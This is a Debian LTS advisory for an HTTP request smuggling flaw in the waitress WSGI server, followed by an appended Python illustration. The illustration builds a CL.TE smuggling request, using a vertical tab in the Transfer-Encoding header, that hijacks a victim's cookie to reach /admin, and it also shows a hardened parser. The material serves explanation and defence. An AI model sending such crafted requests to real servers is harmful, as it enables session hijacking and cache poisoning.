-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Package        : waitress
Version        : 0.8.9-2+deb8u1
Debian Bug     : #765126

It was discovered that there was an HTTP request smuggling vulnerability
in waitress, a pure-Python WSGI server.

If a proxy server is used in front of waitress, an attacker can send an
invalid request that passes through the front-end but is parsed
differently by waitress, creating the potential for request smuggling.
Specially crafted requests containing special whitespace characters in
the Transfer-Encoding header are parsed by Waitress as chunked requests,
while a front-end server uses the Content-Length header instead, because
it considers the Transfer-Encoding header invalid due to the disallowed
characters it contains.

If a front-end server pipelines HTTP requests to a backend Waitress
server, this can lead to HTTP request splitting, which may in turn lead
to cache poisoning or information disclosure.

For Debian 8 "Jessie", this issue has been fixed in waitress version
0.8.9-2+deb8u1.

We recommend that you upgrade your waitress packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS

Regards,

- -- 
      ,''`.
     : :'  :     Chris Lamb
     `. `'`      [email protected] / chris-lamb.co.uk
       `-
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEwv5L0nHBObhsUz5GHpU+J9QxHlgFAl4MpCkACgkQHpU+J9Qx
HlgiDBAAqTn8jF9NkZKCSMyMZsW+Wb4DazHGkEmzl1Uf/u9padPzIo5WKYkuFT3F
AaLaGou8k9DdMZ3i7e9KSZw31vBcyj7oSVaFKBU/SUklC/V5BB8BMhecd+9fPZw8
sk+j7Nm+0iK+ah///RWpm4oG+CfXPXHqeit74pJt02a1mc0DU2cJcMerKkKmeQc7
aD8PlWeTLDO361sJLR9v/5djyEm9Eo6pP7fc7ueMAoPQjS3xxxwUzLBhOEZnWGek
1LS9cwRG4mzfNN8e8GW7cXKqD373iEKBr9o97M6sxwkC4YXrIAzPMcQHo4oJh+Yp
x3rOyxibwJlRpp+gftIjKNGg7SZ3/MFrjtyikLkKz/Q9abLPBrRhLlYSthWVt26b
nbd2s9XVMwqcnKBQj90LZGGB2oudKvL0xdkd8q24NLd/7iPSVVF7Oc4x3iHtjiYv
udTrhcLg+PYpqYKVa0bxXcO65q0PFZkAR7yQHuwPATPSu9HdhRezDjip9GPBrcMr
uOqKpVHGznTTpwDuRDgKd8QaTSnkf1Mn1b/qhOFRqfnnrsLXebZPgqLoMSNzbRRU
aDQ+CW/mie1N9WF5389FfKRZh20UmltU1hS29gC2vaeJYzl9Fp5n8WEbFsUnUirY
zD5KfhJEg/t9Yr7Mzd0jsrdgwBUDAzfEoc9n58gICPRyQDjhxjc=
=a6SU
-----END PGP SIGNATURE-----
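The advisory describes a CL.TE discrepancy: the front-end delimits the request by Content-Length, the backend by a Transfer-Encoding header it accepted only after trimming a non-HTTP whitespace character. The script below is an added editor's example appended to the signed advisory; it is not Waitress source and not the Debian patch. The two toy parsers, the vertical-tab byte (\x0b) standing in for the advisory's "special whitespace characters", the hostnames and paths, the victim request, and the hardened check (modelled here as rejecting the request) are all assumptions made for illustration. The one fact it relies on is that Python's str.strip() with no argument removes \x0b and \x0c, which RFC 7230 does not treat as optional whitespace (OWS is only SP and HTAB).

```python
"""Added illustration of the parsing discrepancy described in the advisory:
a Content-Length-based front-end and a Transfer-Encoding-based backend
disagree about where a request ends.  Toy parsers, not Waitress code."""
from typing import Callable, Dict, Tuple

# RFC 7230 optional whitespace (OWS) is only SP and HTAB.
OWS = b" \t"


def parse_request(raw: bytes) -> Tuple[bytes, Dict[bytes, bytes], bytes]:
    """Split raw bytes into (request line, {lowercased name: raw value}, body).
    Values are left untrimmed so each parser below applies its own trimming."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip(OWS).lower()] = value
    return lines[0], headers, body


def strict_te_is_chunked(value: bytes) -> bool:
    """Front-end model (assumed): trim only OWS, so b'\\x0bchunked' is not 'chunked'
    and the parser falls back to Content-Length."""
    return value.strip(OWS).lower() == b"chunked"


def lenient_te_is_chunked(value: bytes) -> bool:
    """Backend model (assumed): str.strip() also removes \\x0b, \\x0c and other
    characters HTTP does not count as whitespace, so b'\\x0bchunked' reads 'chunked'."""
    return value.decode("latin-1").strip().lower() == "chunked"


def hardened_te_is_chunked(value: bytes) -> bool:
    """Assumed hardening (not the Debian patch): refuse any byte outside RFC 7230
    field-content instead of silently trimming it, so the framing cannot diverge."""
    if any(b < 0x20 and b != 0x09 for b in value) or 0x7F in value:
        raise ValueError("invalid character in Transfer-Encoding")
    return value.strip(OWS).lower() == b"chunked"


def read_chunked(body: bytes) -> Tuple[bytes, bytes]:
    """Decode a chunked body; return (decoded data, bytes left after the 0 chunk)."""
    decoded, rest = b"", body
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        if not size_line:
            raise ValueError("truncated chunked body")
        size = int(size_line.split(b";")[0], 16)     # ignore chunk extensions
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")      # consume the empty trailer
            return decoded, rest
        decoded += rest[:size]
        rest = rest[size + 2:]                        # skip data and its CRLF


def split_request(raw: bytes, te_is_chunked: Callable[[bytes], bool]) -> Tuple[bytes, bytes]:
    """Return (body of the first request, leftover bytes belonging to the next one)."""
    _, headers, body = parse_request(raw)
    te = headers.get(b"transfer-encoding")
    if te is not None and te_is_chunked(te):
        return read_chunked(body)
    length = int(headers.get(b"content-length", b"0").strip(OWS))
    return body[:length], body[length:]


def build_attack() -> bytes:
    """Constructed CL.TE request: Content-Length covers the 0 chunk plus a partial
    request, which only a chunked-aware backend leaves unconsumed."""
    smuggled = b"GET /admin HTTP/1.1\r\nX-Ignore: "
    body = b"0\r\n\r\n" + smuggled
    head = b"\r\n".join([
        b"POST / HTTP/1.1",
        b"Host: app.example",
        b"Content-Length: " + str(len(body)).encode(),
        b"Transfer-Encoding:\x0bchunked",             # vertical tab, not SP/HTAB
        b"", b"",
    ])
    return head + body


def demonstrate() -> Tuple[bytes, bytes, bytes]:
    """Run both parsers over the attack, then show what the backend sees when the
    next (constructed victim) request arrives on the same pipelined connection."""
    attack = build_attack()
    victim = b"GET /profile HTTP/1.1\r\nHost: app.example\r\nCookie: session=victim\r\n\r\n"
    _, front_end_leftover = split_request(attack, strict_te_is_chunked)
    _, backend_leftover = split_request(attack, lenient_te_is_chunked)
    # The backend prepends its leftover to the victim's bytes: the victim's request
    # line becomes an X-Ignore header value and their cookie now authorises /admin.
    return front_end_leftover, backend_leftover, backend_leftover + victim


if __name__ == "__main__":
    fe, be, seen = demonstrate()
    print("front-end leftover:", fe)
    print("backend leftover:  ", be)
    print("backend's next request:\n" + seen.decode())
```

The front-end forwards the whole attack body as one request and has nothing left over; the backend stops after the 0 chunk and keeps the partial GET /admin line in its buffer, which is exactly the request-splitting condition the advisory warns about when the front-end pipelines to Waitress. Swapping hardened_te_is_chunked in for the lenient parser turns the same bytes into a hard parse error, so the two sides can no longer disagree about framing.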
